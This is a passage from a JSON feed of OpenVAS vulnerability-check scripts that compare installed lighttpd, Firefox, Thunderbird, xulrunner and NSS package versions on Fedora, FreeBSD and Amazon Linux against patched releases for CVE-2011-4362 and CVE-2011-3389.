NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:06:42", "description": "Check for the Version of lighttpd", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for lighttpd FEDORA-2012-9040", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:864513", "href": "http://plugins.openvas.org/nasl.php?oid=864513", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9040\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"lighttpd on Fedora 17\";\ntag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\n for high-performance environments. It has a very low memory footprint compared\n to other webservers and takes care of cpu-load. Its advanced feature-set\n (FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\n it the perfect webserver-software for every server that is suffering load\n problems.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html\");\n script_id(864513);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:35 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-9040\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9040\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:04", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "FreeBSD Ports: lighttpd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231070584", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_lighttpd7.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID c6521b04-314b-11e1-9cf4-5404a67eef98\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70584\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: lighttpd\n\nCVE-2011-4362\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"lighttpd\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.4.30\")<0) {\n txt += 'Package lighttpd version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for lighttpd FEDORA-2012-9040", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864513", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9040\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864513\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:35 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9040\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9040\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lighttpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"lighttpd on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-17T23:03:18", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-107)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120270", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120270", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120270\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:22:01 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-107)\");\n script_tag(name:\"insight\", value:\"Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.\");\n script_tag(name:\"solution\", value:\"Run yum update lighttpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-107.html\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-fastcgi\", rpm:\"lighttpd-fastcgi~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-mod_mysql_vhost\", rpm:\"lighttpd-mod_mysql_vhost~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-debuginfo\", rpm:\"lighttpd-debuginfo~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-mod_geoip\", rpm:\"lighttpd-mod_geoip~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for thunderbird FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863916", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863916", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for thunderbird FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071323.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863916\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:36:17 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17400\");\n script_name(\"Fedora Update for thunderbird FEDORA-2011-17400\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"thunderbird on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~9.0~4.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-02T10:58:22", "description": "Check for the Version of xulrunner", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for xulrunner FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-01T00:00:00", "id": "OPENVAS:863694", "href": "http://plugins.openvas.org/nasl.php?oid=863694", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xulrunner FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xulrunner on Fedora 15\";\ntag_insight = \"XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM\n applications that are as rich as Firefox and Thunderbird. It provides mechanisms\n for installing, upgrading, and uninstalling these applications. XULRunner also\n provides libxul, a solution which allows the embedding of Mozilla technologies\n in other projects and products.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072227.html\");\n script_id(863694);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:44 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17399\");\n script_name(\"Fedora Update for xulrunner FEDORA-2011-17399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xulrunner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~9.0.1~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-11T11:07:57", "description": "Check for the Version of nss-util", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for nss-util FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-09T00:00:00", "id": "OPENVAS:864068", "href": "http://plugins.openvas.org/nasl.php?oid=864068", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss-util FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"nss-util on Fedora 16\";\ntag_insight = \"Utilities for Network Security Services and the Softoken module\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071320.html\");\n script_id(864068);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 13:06:51 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17400\");\n script_name(\"Fedora Update for nss-util FEDORA-2011-17400\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss-util\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss-util\", rpm:\"nss-util~3.13.1~3.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:40", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for firefox FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863696", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863696", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for firefox FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072224.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863696\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:48 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n script_name(\"Fedora Update for firefox FEDORA-2011-17399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"firefox on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~9.0.1~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for nss FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863697", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863697", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072229.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863697\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", 